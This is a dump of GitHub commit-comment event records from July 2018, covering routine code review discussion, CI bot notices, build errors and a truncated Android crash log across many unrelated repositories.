{"id":"7913700210","type":"CommitCommentEvent","actor":{"login":"jadamcrain"},"repo":{"name":"automatak/dnp3"},"payload":{"comment":{"id":29583830,"position":40,"line":65,"path":"cpp/libs/src/opendnp3/app/parsing/APDUHeaderParser.h","commit_id":"c21a51b174a297be0d6d2bfb17243df1ed628307","created_at":"2018-07-03T16:31:35Z","updated_at":"2018-07-03T16:31:35Z","author_association":"MEMBER","body":"It's not clear to me what version of Clang you're running since I'm not familiar with Apple version numbers. This SO post says it may be based on Clang 3.9.0:\r\n\r\nhttps://stackoverflow.com/questions/33603027/get-apple-clang-version-and-corresponding-upstream-llvm-version\r\n\r\nRegardless, this version of Clang appears to think that const members cannot be implicitly initialized... I'm not sure what the C++ standard has to say on this, but we've never run into this issue before with any other version of Clang or GCC.... I just compiled with Clang 6.0 and no errors.\r\n\r\nI suppose the correct fix here is explicitly initialize all the const members as that should compile everywhere."}},"created_at":"2018-07-03T16:31:35Z"}
{"id":"7913704561","type":"CommitCommentEvent","actor":{"login":"sampathacks"},"repo":{"name":"sampathacks/TechNInjaRepositoryNew"},"payload":{"comment":{"id":29583838,"position":199,"line":199,"path":"SignUp.java","commit_id":"1cf1fd0d5e2d11222f61915c5992a6fa5eaf79a8","created_at":"2018-07-03T16:32:25Z","updated_at":"2018-07-03T16:32:25Z","author_association":"OWNER","body":" public void signup()\r\n\t\t    {\r\n\t\t    \t java.awt.EventQueue.invokeLater(new Runnable() {\r\n\t\t\t            public void run() {\r\n\t\t\t                new SignUp().setVisible(true);\r\n\t\t\t            }\r\n\t\t\t        });\r\n\t\t    }"}},"created_at":"2018-07-03T16:32:25Z"}
{"id":"7913705158","type":"CommitCommentEvent","actor":{"login":"ggalmazor"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29583839,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:32:31Z","updated_at":"2018-07-03T16:32:31Z","author_association":"NONE","body":"What does the try with resources do here?"}},"created_at":"2018-07-03T16:32:31Z"}
{"id":"7913706289","type":"CommitCommentEvent","actor":{"login":"cindyloo"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29583842,"position":129,"line":102,"path":"src/components/explorer/results/drilldowns/WordInContextDrillDownContainer.js","commit_id":"52e33ae3c0a2343183c69c0426586228619e4cea","created_at":"2018-07-03T16:32:44Z","updated_at":"2018-07-03T16:32:44Z","author_association":"COLLABORATOR","body":"does this need to know about the queries? looks like you aren't using it..."}},"created_at":"2018-07-03T16:32:44Z"}
{"id":"7913713258","type":"CommitCommentEvent","actor":{"login":"cscortes"},"repo":{"name":"cscortes/crazyvaders"},"payload":{"comment":{"id":29583853,"position":null,"line":null,"path":null,"commit_id":"1f776bfea8b30880a1dfa44a3be54f7be55b1f6a","created_at":"2018-07-03T16:34:03Z","updated_at":"2018-07-03T16:34:03Z","author_association":"OWNER","body":"Okay looks good.  "}},"created_at":"2018-07-03T16:34:03Z"}
{"id":"7913716852","type":"CommitCommentEvent","actor":{"login":"rahulbot"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29583860,"position":129,"line":102,"path":"src/components/explorer/results/drilldowns/WordInContextDrillDownContainer.js","commit_id":"52e33ae3c0a2343183c69c0426586228619e4cea","created_at":"2018-07-03T16:34:46Z","updated_at":"2018-07-03T16:34:46Z","author_association":"CONTRIBUTOR","body":"good point - was just pattern matching. will remove."}},"created_at":"2018-07-03T16:34:46Z"}
{"id":"7913716889","type":"CommitCommentEvent","actor":{"login":"warrenv"},"repo":{"name":"poetapp/explorer-web"},"payload":{"comment":{"id":29583861,"position":2,"line":6,"path":"devServer.js","commit_id":"c3a6433396662901c13542bf0fb25e0770c0bdd4","created_at":"2018-07-03T16:34:46Z","updated_at":"2018-07-03T16:34:46Z","author_association":"MEMBER","body":"EXPLORER_WEB_PORT is 3001 in local-dev/docker-compose.yml.\r\ndo we want to make that the default here as well? I seem to remember a port conflict with 3000 at some point in the past."}},"created_at":"2018-07-03T16:34:46Z"}
{"id":"7913717771","type":"CommitCommentEvent","actor":{"login":"sampathacks"},"repo":{"name":"sampathacks/TechNInjaRepositoryNew"},"payload":{"comment":{"id":29583863,"position":144,"line":144,"path":"Login.java","commit_id":"1cf1fd0d5e2d11222f61915c5992a6fa5eaf79a8","created_at":"2018-07-03T16:34:56Z","updated_at":"2018-07-03T16:34:56Z","author_association":"OWNER","body":" public void login()\r\n\t    {\r\n\t    \t java.awt.EventQueue.invokeLater(new Runnable() {\r\n\t\t            public void run() {\r\n\t\t                new Login().setVisible(true);\r\n\t\t            }\r\n\t\t        });\r\n\t\t    }"}},"created_at":"2018-07-03T16:34:56Z"}
{"id":"7913718673","type":"CommitCommentEvent","actor":{"login":"cscortes"},"repo":{"name":"cscortes/crazyvaders"},"payload":{"comment":{"id":29583866,"position":null,"line":null,"path":null,"commit_id":"1f776bfea8b30880a1dfa44a3be54f7be55b1f6a","created_at":"2018-07-03T16:35:07Z","updated_at":"2018-07-03T16:35:07Z","author_association":"OWNER","body":"Need to add pics."}},"created_at":"2018-07-03T16:35:07Z"}
{"id":"7913724359","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29583873,"position":null,"line":null,"path":null,"commit_id":"bce5f65433ffd839a65209c5af918b5ad7b6af5b","created_at":"2018-07-03T16:36:14Z","updated_at":"2018-07-03T16:36:14Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-76-d8train.pantheonsite.io/)\n\nCreated multidev environment [ci-76](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#ci-76) for d8train."}},"created_at":"2018-07-03T16:36:14Z"}
{"id":"7913729499","type":"CommitCommentEvent","actor":{"login":"taskcluster[bot]"},"repo":{"name":"servo/servo"},"payload":{"comment":{"id":29583882,"position":null,"line":null,"path":null,"commit_id":"0a8824a7fb72b8c68d7fe38def09871c546ae902","created_at":"2018-07-03T16:37:13Z","updated_at":"2018-07-03T16:37:13Z","author_association":"NONE","body":"<details>\n\n<summary>Submitting the task to Taskcluster failed. Details</summary>\n\nYou do not have sufficient scopes. You are missing the following scopes:\n\n```\n{\n  \"AnyOf\": [\n    {\n      \"AnyOf\": [\n        \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n        \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n      ]\n    },\n    {\n      \"AnyOf\": [\n        \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n        {\n          \"AllOf\": [\n            \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n            \"queue:task-group-id:taskcluster-github/GV_2fWuORVyOrtg47AZUUw\",\n            \"queue:schedule-task:taskcluster-github/GV_2fWuORVyOrtg47AZUUw/GV_2fWuORVyOrtg47AZUUw\"\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\nYou have the scopes:\n\n```\n[\n  \"assume:project:taskcluster:mozilla-github-repository\",\n  \"assume:repo:github.com/servo/servo:pull-request\",\n  \"notify:email:*\",\n  \"notify:irc-channel:*\",\n  \"notify:irc-user:*\",\n  \"queue:create-task:aws-provisioner-v1/github-worker\",\n  \"queue:create-task:aws-provisioner-v1/github-worker-windows\",\n  \"queue:create-task:aws-provisioner-v1/servo\",\n  \"queue:create-task:aws-provisioner-v1/win2012r2\",\n  \"queue:route:garbage.*\",\n  \"queue:route:index.garbage.*\",\n  \"queue:route:notify.email.*\",\n  \"queue:route:notify.irc-channel.*\",\n  \"queue:route:notify.irc-user.*\",\n  \"queue:scheduler-id:taskcluster-github\",\n  \"secrets:get:garbage/*\",\n  \"secrets:set:garbage/*\"\n]\n```\n\nThis request requires you to satisfy this scope expression:\n\n```\n{\n  \"AllOf\": [\n    {\n      \"AnyOf\": [\n        {\n          \"AllOf\": [\n            \"queue:scheduler-id:taskcluster-github\",\n            {\n              \"AnyOf\": [\n                \"queue:create-task:highest:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:high:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:medium:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:very-low:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:create-task:lowest:aws-provisioner-v1/servo-docker-worker\"\n              ]\n            }\n          ]\n        },\n        {\n          \"AnyOf\": [\n            \"queue:create-task:aws-provisioner-v1/servo-docker-worker\",\n            {\n              \"AllOf\": [\n                \"queue:define-task:aws-provisioner-v1/servo-docker-worker\",\n                \"queue:task-group-id:taskcluster-github/GV_2fWuORVyOrtg47AZUUw\",\n                \"queue:schedule-task:taskcluster-github/GV_2fWuORVyOrtg47AZUUw/GV_2fWuORVyOrtg47AZUUw\"\n              ]\n            }\n          ]\n        }\n      ]\n    }\n  ]\n}\n```\n\n---\n\n* method:     createTask\n* errorCode:  InsufficientScopes\n* statusCode: 403\n* time:       2018-07-03T16:37:13.253Z\n\n</details>"}},"created_at":"2018-07-03T16:37:13Z"}
{"id":"7913734433","type":"CommitCommentEvent","actor":{"login":"cindyloo"},"repo":{"name":"mitmedialab/MediaCloud-Web-Tools"},"payload":{"comment":{"id":29583893,"position":129,"line":102,"path":"src/components/explorer/results/drilldowns/WordInContextDrillDownContainer.js","commit_id":"52e33ae3c0a2343183c69c0426586228619e4cea","created_at":"2018-07-03T16:38:11Z","updated_at":"2018-07-03T16:38:11Z","author_association":"COLLABORATOR","body":"we aren't pulling it out of state so that wouldn't have been causing any re-rendering issues, but saw it in passing.."}},"created_at":"2018-07-03T16:38:11Z"}
{"id":"7913740584","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29583911,"position":null,"line":null,"path":null,"commit_id":"d14259ca944341b93adb46c7fad60d250cbb3051","created_at":"2018-07-03T16:39:24Z","updated_at":"2018-07-03T16:39:24Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-rolefx](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-rolefx).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-rolefx-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-03T16:39:24Z"}
{"id":"7913745959","type":"CommitCommentEvent","actor":{"login":"marlop352"},"repo":{"name":"ReimuHakurei/phppgadmin"},"payload":{"comment":{"id":29583921,"position":13,"line":497,"path":"classes/Misc.php","commit_id":"290741aa8f75076963b8d7786e2c807dbcfad5d4","created_at":"2018-07-03T16:40:27Z","updated_at":"2018-07-03T16:40:27Z","author_association":"NONE","body":"might I ask why hardcode it, instead o keeping it the way it was?"}},"created_at":"2018-07-03T16:40:27Z"}
{"id":"7913756363","type":"CommitCommentEvent","actor":{"login":"PiezPiedPy"},"repo":{"name":"steamp0rt/Kerbalism"},"payload":{"comment":{"id":29583941,"position":null,"line":null,"path":null,"commit_id":"a6a835d579d45f24bdefd0ee6750b7dcd056d19b","created_at":"2018-07-03T16:42:26Z","updated_at":"2018-07-03T16:42:26Z","author_association":"CONTRIBUTOR","body":"You missed the Changelog.md 😛 "}},"created_at":"2018-07-03T16:42:26Z"}
{"id":"7913761832","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":29583959,"position":null,"line":null,"path":null,"commit_id":"39191fc040524e2c56b575bb799e6119cc52c3be","created_at":"2018-07-03T16:43:34Z","updated_at":"2018-07-03T16:43:34Z","author_association":"MEMBER","body":"Summarize operates on sums, but this is just the code that traverses the input recursively (and builds up the KB) until it gets to a sum that can be operated on."}},"created_at":"2018-07-03T16:43:34Z"}
{"id":"7913764101","type":"CommitCommentEvent","actor":{"login":"dhyansraj"},"repo":{"name":"synechron-finlabs/quorum-maker"},"payload":{"comment":{"id":29583967,"position":null,"line":null,"path":null,"commit_id":"c48466c213509b0e6186f7ebe8fd1e7466dc0d19","created_at":"2018-07-03T16:43:59Z","updated_at":"2018-07-03T16:43:59Z","author_association":"COLLABORATOR","body":"Just wanted the constellation configuration more in line with 7 node example. The latest 7 node example uses inline parameters. Later I also thought it would be more beneficial to have a conf file for constellation. I can bring it back. \r\n\r\nAre the TLS options for constellation? I am thinking of adding an optional expert mode, where more information can be entered at creation time. \r\n\r\nIf you think you can help, please feel to create a pull request to development branch. Happy to add your work. "}},"created_at":"2018-07-03T16:43:59Z"}
{"id":"7913772584","type":"CommitCommentEvent","actor":{"login":"herlo"},"repo":{"name":"CentOS-PaaS-SIG/linchpin"},"payload":{"comment":{"id":29583996,"position":11,"line":28,"path":"linchpin/provision/roles/beaker/files/schema.json","commit_id":"013a0169ae027d8ff65659a310f7ff83201b7573","created_at":"2018-07-03T16:45:38Z","updated_at":"2018-07-03T16:45:38Z","author_association":"MEMBER","body":"Just to be sure, these two were NOT required previously. Is it your intent to require at least one of them?"}},"created_at":"2018-07-03T16:45:38Z"}
{"id":"7913774172","type":"CommitCommentEvent","actor":{"login":"nathanchance"},"repo":{"name":"flar2/wahoo"},"payload":{"comment":{"id":29583998,"position":null,"line":null,"path":null,"commit_id":"2c5fbe8e661a6f9d4499580a0a216a766da7d0e8","created_at":"2018-07-03T16:45:55Z","updated_at":"2018-07-03T16:45:55Z","author_association":"NONE","body":"For what it's worth, we found this to be buggy, this is the cleaner solution.\r\n\r\nhttps://github.com/sultanxda/android_kernel_google_wahoo/commit/1ca2f377c11270991c2ea33eab1efddf58404970\r\n\r\nhttps://github.com/sultanxda/android_kernel_google_wahoo/commit/d5cb99420402895e53a76ba02a0f046db93753a8"}},"created_at":"2018-07-03T16:45:55Z"}
{"id":"7913776331","type":"CommitCommentEvent","actor":{"login":"dcramer"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29584004,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T16:46:19Z","updated_at":"2018-07-03T16:46:19Z","author_association":"NONE","body":"@lightswitch05 will sync up with the team and see if we can do it. I don't think we'd utilize this header four event reporting though. If we did, at best we'd anonymize the payload (remove the IP and user data). The concern again for us is that as a business we have no problem with people opt-ing out of tracking (especially given we're opt-in), its just that our customers are sending error reports to us, many times with completely anonymous data."}},"created_at":"2018-07-03T16:46:19Z"}
{"id":"7913779421","type":"CommitCommentEvent","actor":{"login":"kimocoder"},"repo":{"name":"fariouche/rtl8812AU"},"payload":{"comment":{"id":29584010,"position":null,"line":null,"path":null,"commit_id":"418f36bba19bc28fd09c360f5e49d07529ed554e","created_at":"2018-07-03T16:46:55Z","updated_at":"2018-07-03T16:46:55Z","author_association":"NONE","body":"I'm trying to add the 8814 HAL from [here](https://github.com/astsam/rtl8812au/tree/v5.1.5) looking at [this](https://github.com/astsam/rtl8812au/commit/55e81afe4f9fa556cafe6e789b91043535d85b3a) commit, but I hit a issue with the output:\r\n\r\nerror: unknown type name ‘PDM_ODM_T’; did you mean ‘ODM_DPDT’?\r\n  IN  PDM_ODM_T  pDM_Odm,\r\n      ^~~~~~~~~\r\n      ODM_DPDT\r\n\r\ncould you be able to help me out with that?"}},"created_at":"2018-07-03T16:46:55Z"}
{"id":"7913783478","type":"CommitCommentEvent","actor":{"login":"Gabriel439"},"repo":{"name":"dhall-lang/dhall-nix"},"payload":{"comment":{"id":29584019,"position":7,"line":33,"path":"dhall-nix.cabal","commit_id":"4c7e66bb6a39eaf9c2b888cb51a30965a88d7c75","created_at":"2018-07-03T16:47:43Z","updated_at":"2018-07-03T16:47:43Z","author_association":"COLLABORATOR","body":"The main thing I commit to supporting is Stackage, meaning that the latest versions of the `dhall-*` packages will all build together (and with other packages on Stackage).  That's why I release them all in lockstep whenever I make any breaking changes to the `dhall` package and I also curate the upper and lower bounds to reflect the valid build plans.  So that means that if Nix tracks a certain Stackage resolver then `dhall-*` packages should build if you select the exact set of `dhall-*` packages that the Stackage resolver selects.\r\n\r\nThe exception is `dhall-nix` which I only recently found out had been removed from Stackage because I must have missed the e-mail notification for the `hnix` major version change, and I plan to add that back to Stackage soon now that it's fixed.\r\n\r\nHowever, supporting anything beyond that is a huge maintenance burden.  That was part of the reason that Stackage was created in the first place since supporting build plans for all possible permutations of older dependencies was infeasible and led to people aggressively avoiding dependencies back in those days.  The other problem is that supporting older build plans leads to diffuse blame when things go wrong because then no one person is accountable for fixing invalid build plans."}},"created_at":"2018-07-03T16:47:43Z"}
{"id":"7913784352","type":"CommitCommentEvent","actor":{"login":"mkalmes"},"repo":{"name":"marcelkraus/speedometer"},"payload":{"comment":{"id":29584025,"position":null,"line":null,"path":null,"commit_id":"b0b7349bcac38e288d7fb7496a8966419b83cff8","created_at":"2018-07-03T16:47:54Z","updated_at":"2018-07-03T16:47:54Z","author_association":"COLLABORATOR","body":"Nice!"}},"created_at":"2018-07-03T16:47:54Z"}
{"id":"7913784836","type":"CommitCommentEvent","actor":{"login":"trananhdat"},"repo":{"name":"trananhdat/SmartMobilityASAL"},"payload":{"comment":{"id":29584026,"position":null,"line":null,"path":null,"commit_id":"d395289579c6847f7b6f648b4a8188bd907dfeb9","created_at":"2018-07-03T16:48:00Z","updated_at":"2018-07-03T16:48:00Z","author_association":"OWNER","body":"Link tải fonts: d395289579c6847f7b6f648b4a8188bd907dfeb9"}},"created_at":"2018-07-03T16:48:00Z"}
{"id":"7913791557","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29584035,"position":null,"line":null,"path":null,"commit_id":"146cc4feb7e177cce722c03b51e6a3889dfb29e2","created_at":"2018-07-03T16:49:17Z","updated_at":"2018-07-03T16:49:17Z","author_association":"NONE","body":"Sorry this is not a simplification because the material values are compile time constant. So the threshold to which material is compared is a constant (we could simply write the number their and it gives the same binary, but in this way its more readable code). You simply change the constant so its more like a tuning. The same would hold for your previous attempt (only with the constant 0)."}},"created_at":"2018-07-03T16:49:17Z"}
{"id":"7913794488","type":"CommitCommentEvent","actor":{"login":"dcramer"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29584046,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T16:49:52Z","updated_at":"2018-07-03T16:49:52Z","author_association":"NONE","body":"@lightswitch05 https://github.com/getsentry/sentry/issues/8918"}},"created_at":"2018-07-03T16:49:52Z"}
{"id":"7913795889","type":"CommitCommentEvent","actor":{"login":"ewright-rms"},"repo":{"name":"joyent/sup-notify"},"payload":{"comment":{"id":29584050,"position":null,"line":null,"path":null,"commit_id":"63f62e41ea3f916ea4e48db846b4ddc32a3bd1f5","created_at":"2018-07-03T16:50:10Z","updated_at":"2018-07-03T16:50:10Z","author_association":"NONE","body":"Nice job checking in multiple passwords here."}},"created_at":"2018-07-03T16:50:10Z"}
{"id":"7913796604","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584051,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:50:17Z","updated_at":"2018-07-03T16:50:17Z","author_association":"OWNER","body":"It’s meant to close the stream right away, rain or shine."}},"created_at":"2018-07-03T16:50:17Z"}
{"id":"7913800708","type":"CommitCommentEvent","actor":{"login":"ggalmazor"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584061,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:51:06Z","updated_at":"2018-07-03T16:51:06Z","author_association":"NONE","body":"I didn't know streams had to be closed :P Alright! :)"}},"created_at":"2018-07-03T16:51:06Z"}
{"id":"7913804797","type":"CommitCommentEvent","actor":{"login":"ur1y"},"repo":{"name":"yousefissa/Twitter-Follow-and-Unfollow-Bot"},"payload":{"comment":{"id":29584067,"position":null,"line":null,"path":null,"commit_id":"c5b0d982f7bd6a623b071117cf35da8ea33dd748","created_at":"2018-07-03T16:51:52Z","updated_at":"2018-07-03T16:51:52Z","author_association":"NONE","body":"Hi i'm trying to use your twitter-bot, but something goes wrong.\r\nCan you help me? I’m not a dev, just artist...\r\nI have installed python 3.7\r\nInstalled pip\r\nInstalled tweepy\r\n\r\nI have put screen_name, key, secret, acess token and secret in required fields, and than when I'm launching twitterBot.py that window opens and immediately closes"}},"created_at":"2018-07-03T16:51:52Z"}
{"id":"7913809491","type":"CommitCommentEvent","actor":{"login":"davidjgonzalez"},"repo":{"name":"Adobe-Consulting-Services/acs-aem-commons"},"payload":{"comment":{"id":29584078,"position":102,"line":539,"path":"bundle/src/main/java/com/adobe/acs/commons/errorpagehandler/impl/ErrorPageHandlerImpl.java","commit_id":"aab03112d399fc81eb031b5426602db4e12be1a2","created_at":"2018-07-03T16:52:47Z","updated_at":"2018-07-03T16:52:47Z","author_association":"CONTRIBUTOR","body":"See #1415"}},"created_at":"2018-07-03T16:52:47Z"}
{"id":"7913811702","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"EPashkin/glib"},"payload":{"comment":{"id":29584081,"position":9,"line":9,"path":"src/gobject/auto/binding.rs","commit_id":"2e2b3ef8a7ee7e2d8ce14f195cd45af19dd9d456","created_at":"2018-07-03T16:53:12Z","updated_at":"2018-07-03T16:53:12Z","author_association":"NONE","body":"What's that? :)"}},"created_at":"2018-07-03T16:53:12Z"}
{"id":"7913812367","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29584083,"position":null,"line":null,"path":null,"commit_id":"6cfd78a55579263a1b4aebb2934f42451d8801f8","created_at":"2018-07-03T16:53:19Z","updated_at":"2018-07-03T16:53:19Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wordpresss](https://wordpresss-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-s3](https://wordpresss-static-docs.pantheonsite.io/docs/wordpress-s3)\n"}},"created_at":"2018-07-03T16:53:19Z"}
{"id":"7913814974","type":"CommitCommentEvent","actor":{"login":"lightswitch05"},"repo":{"name":"lightswitch05/hosts"},"payload":{"comment":{"id":29584086,"position":null,"line":null,"path":null,"commit_id":"6a256c58cc46b43e5961373c3e5640743c178932","created_at":"2018-07-03T16:53:47Z","updated_at":"2018-07-03T16:53:47Z","author_association":"OWNER","body":"@dcramer the DNT policy has language to allow truly anonymized data. If you are able to support it I'm happy to remove from the list. I'll follow the ticket you linked to 👍 "}},"created_at":"2018-07-03T16:53:47Z"}
{"id":"7913816777","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584088,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:54:11Z","updated_at":"2018-07-03T16:54:11Z","author_association":"OWNER","body":"I don’t think they do, but this frees the “resources” right away, according to the close() doc comment."}},"created_at":"2018-07-03T16:54:11Z"}
{"id":"7913817584","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29584089,"position":5,"line":3,"path":"docs/integration/alerts-hipchat-integration.md","commit_id":"bd2110f776e38b23d67cb10c2768103766001fa5","created_at":"2018-07-03T16:54:20Z","updated_at":"2018-07-03T16:54:20Z","author_association":"MEMBER","body":"On Premise ==> Sematext Enterprise (and link it?)"}},"created_at":"2018-07-03T16:54:20Z"}
{"id":"7913821455","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29584096,"position":44,"line":25,"path":"docs/integration/alerts-hipchat-integration.md","commit_id":"bd2110f776e38b23d67cb10c2768103766001fa5","created_at":"2018-07-03T16:55:08Z","updated_at":"2018-07-03T16:55:08Z","author_association":"MEMBER","body":"SPM ==> Sematext"}},"created_at":"2018-07-03T16:55:08Z"}
{"id":"7913823451","type":"CommitCommentEvent","actor":{"login":"dcbriccetti"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584100,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:55:29Z","updated_at":"2018-07-03T16:55:29Z","author_association":"OWNER","body":"I dislike not being able to assign submissionCoun = try ..., as in Scala."}},"created_at":"2018-07-03T16:55:29Z"}
{"id":"7913826182","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29584106,"position":null,"line":null,"path":null,"commit_id":"9d7c4b5afe68824ed78194bf3c4b74911f278b75","created_at":"2018-07-03T16:56:02Z","updated_at":"2018-07-03T16:56:02Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [newtoidpat](https://newtoidpat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/server_name-and-server_port](https://newtoidpat-static-docs.pantheonsite.io/docs/server_name-and-server_port)\n"}},"created_at":"2018-07-03T16:56:02Z"}
{"id":"7913826955","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29584107,"position":null,"line":null,"path":null,"commit_id":"23cd67a280286df64cd5a009afc38152a27aac96","created_at":"2018-07-03T16:56:13Z","updated_at":"2018-07-03T16:56:13Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-673](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-673).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-673-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-03T16:56:13Z"}
{"id":"7913830882","type":"CommitCommentEvent","actor":{"login":"ggalmazor"},"repo":{"name":"dcbriccetti/briefcase"},"payload":{"comment":{"id":29584110,"position":8,"line":73,"path":"src/org/opendatakit/briefcase/export/ExportToCsv.java","commit_id":"00e0f42d2588b27f5fa849280358f35fb8b1d8f6","created_at":"2018-07-03T16:56:57Z","updated_at":"2018-07-03T16:56:57Z","author_association":"NONE","body":"I see... Could that improve memory usage, then?\r\n\r\nI hope we get `Try` soon :P"}},"created_at":"2018-07-03T16:56:57Z"}
{"id":"7913833944","type":"CommitCommentEvent","actor":{"login":"YumeMichi"},"repo":{"name":"MindTheGapps/vendor_gapps"},"payload":{"comment":{"id":29584114,"position":null,"line":null,"path":null,"commit_id":"76ba6356470891912e3eb86290ed2411ccb2e577","created_at":"2018-07-03T16:57:32Z","updated_at":"2018-07-03T16:57:32Z","author_association":"NONE","body":"ARM\r\n```\r\n07-04 00:47:04.139   604  6441 I WifiService: getVerboseLoggingLevel uid=10058\r\n07-04 00:47:04.146  7753  7753 D AndroidRuntime: Shutting down VM\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime: FATAL EXCEPTION: main\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime: Process: com.google.android.setupwizard, PID: 7753\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime: java.lang.RuntimeException: Unable to resume activity {com.google.android.setupwizard/com.google.android.setupwizard.network.NetworkActivity}: java.lang.SecurityException: NetworkScoreService: Neither user 10058 nor current process has android.permission.REQUEST_NETWORK_SCORES.\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread.performResumeActivity(ActivityThread.java:3582)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread.handleResumeActivity(ActivityThread.java:3622)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:2863)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread.-wrap11(Unknown Source:0)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1590)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.os.Handler.dispatchMessage(Handler.java:106)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.os.Looper.loop(Looper.java:164)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at android.app.ActivityThread.main(ActivityThread.java:6499)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at java.lang.reflect.Method.invoke(Native Method)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:438)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime:        at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:807)\r\n07-04 00:47:04.147  7753  7753 E AndroidRuntime: Caused by: 